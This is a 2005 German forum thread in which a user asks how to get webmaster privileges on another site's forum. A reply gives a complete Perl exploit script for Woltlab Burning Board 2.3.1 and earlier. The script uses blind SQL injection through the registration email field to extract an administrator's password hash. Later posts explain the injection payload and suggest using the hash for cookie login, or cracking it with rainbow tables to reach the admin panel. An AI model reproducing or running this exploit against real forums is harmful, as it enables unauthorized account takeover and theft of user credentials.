Wie kann ich mir die gleichen Funktionen wie bei ein Webmaster habe?

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von DuelKing722, 3. Juni 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 3. Juni 2005
    Also versteht das nicht falsch. Ich will nicht rush-board hacken :D

    Aber z.B. bei Startseite - eTCG.de - Forum wie kann ich mir genau die Funktionen wie der Webmaster erhalten???

    Weiss das jemand?

    Wäre sehr nett.
     

  2. Anzeige
  3. #2 3. Juni 2005
    Code:
    #!/usr/bin/perl
    use strict;
    use IO::Socket::INET;
    
    $| = print " Woltlab Burning Board <= 2.3.1 Exploit by XodoX\n";
    my $host = 'www.meineseite.de';
    my $path = '/'; # path to the board
    my $userid = 1; # the password hash will be from the user with this id
    my $username = 'Bedankomat'; # any username from the board
    my $proxy = ''; # proxy, you can leave this empty
    my $error = 'E-Mail-Adresse ist unzul&auml;ssig';
    
    my ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80);
    if($proxy ne '') { print "[~] Using a proxy\n"; 
    } else { print "[~] You're using NO proxy!\n";
    sleep(1);
    }
    
    print "[~] Getting the hash. Please wait some minutes..\n[+] Hash: ";
    
    my $hash = '';
    for(my $i=1;$i<33;$i++) {
    my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp')
    or die('[-] Could not connect to server');
    
    if(&test($i, 96)) {
    for(my $c=97;$c<103;$c++) {
    if(&test($i, $c, 1)) {
    print pack('c', $c);
    last; }
    }
    } else {
    for(my $c=48;$c<58;$c++) {
    if(&test($i, $c, 1)) {
    print pack('c', $c);
    last; }
    }
    }
    }
    print "\n";
    
    sub test {
    my ($i, $num, $g) = @_;
    my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp')
    or die("Could not connect to server");
    my $value = "ZpipAxTSv\@P8d5ihhs.org' OR (userid=$userid AND ascii(substring(password,$i,1))";
    $value .= ($g) ? '=' : '>';
    $value .= "$num)/*";
    my $data = "r_username=$username&r_email=$value&r_password=aaaaaaaa&r_confirmpassword=aaaaaaaa&r_homepage=&r_icq=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=&r_gender=0&r_signature=&r_usertext=&field%5B1%5D=&field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecookies=1&r_admincanemail=1&r_showemail=1&r_usercanemail=1&r_emailnotify=0&r_notificationperpm=0&r_receivepm=1&r_emailonpm=0&r_pmpopup=0&r_showsignatures=1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_umaxposts=0&r_threadview=0&r_dateformat=d.m.Y&r_timeformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_usewysiwyg=0&r_styleid=0&r_langid=0&send=send&sid=&disclaimer=viewed";
    
    print $sock "POST http://$host${path}register.php HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".length($data)."\r\n\r\n$data\r\n";
    
    while(<$sock>){
    if($_ =~ m/$error/) { return 1; }}
    return 0;
    }
    
    Ohne Gewähr.
     
  4. #3 3. Juni 2005
    Das kann man ja gar nicht lesen :D
     
  5. #4 3. Juni 2005
    Copy && Paste in Texteditor?

    Außerdem ist es kein "Tutorial" sodern ein Perl-Quellcode.
     
  6. #5 3. Juni 2005
    dann lern es
     
  7. #6 3. Juni 2005
    Kann mir jemand erklären wie das funktioniert?
     
  8. #7 5. Juni 2005
    als was muss ich die datei speichern? pearl hat was für ne endung ???

    ps: thx gibt ne 10
     
  9. #8 5. Juni 2005
    Endung: pl
    unter win #!pfad_zu_perl.exe
    Nützt eine Schwachstelle in register.php aus.
    Die Variable r_email übergit normalerweise die Emailadresse.
    Hier:
    r_email=bla@blub.org' OR (userid=[benutzerid] AND ascii(substring(password,[position im pw-hash],1))=[zeichencode])/*";

    kommt keine Fehlermeldung (email not found) stimmt das Zeichen.
    Auf die Art kann man sich den md5 verschlüsselten PW-Hash ausgeben lassen.
    Dann einfach in den Cookie einbauen oder (umständlich) knacken.

    //edit: die obengenannte seite hat wohl einen Filter; daher funktioniert diese Methode nicht.

    warscheinlich sowas in der Art:
    Code:
    if(isset($_POST['r_email'])){
    if (preg_match("/^[A-Z0-9._%-]+@[A-Z0-9._%-]+\.[A-Z]{2,6}$/i", $_POST['r_email'])) {
    $r_email = $_POST['r_email'];}
    }else{ 
    echo "just :mad: off\n";
    }
    
     
  10. #9 5. Juni 2005
    Wobei das "umständlich" eigentlich zu bevorzugen ist, weil man kommt zwar
    mit dem MD5-Hash ins normale Forum durch Cookie-Editing rein - ins ACP
    allerdings nicht weil das läuft über Session-IDs und nicht über Cookies.
    Demzufolge bleibt eigentlich nur der Weg des Crackens des Hashes,
    was allerdings bei halbwegs guten Rainbow-Tables nicht das große Problem sein sollte.

    Sofern jemand andere Wege kennt --> bitte sofort sagen :)
     

  11. Videos zum Thema
Die Seite wird geladen...
Similar Threads - kann mir gleichen
  1. Antworten:
    4
    Aufrufe:
    5.894
  2. Antworten:
    35
    Aufrufe:
    5.631
  3. Antworten:
    0
    Aufrufe:
    17.031
  4. Antworten:
    1
    Aufrufe:
    1.082
  5. Antworten:
    3
    Aufrufe:
    885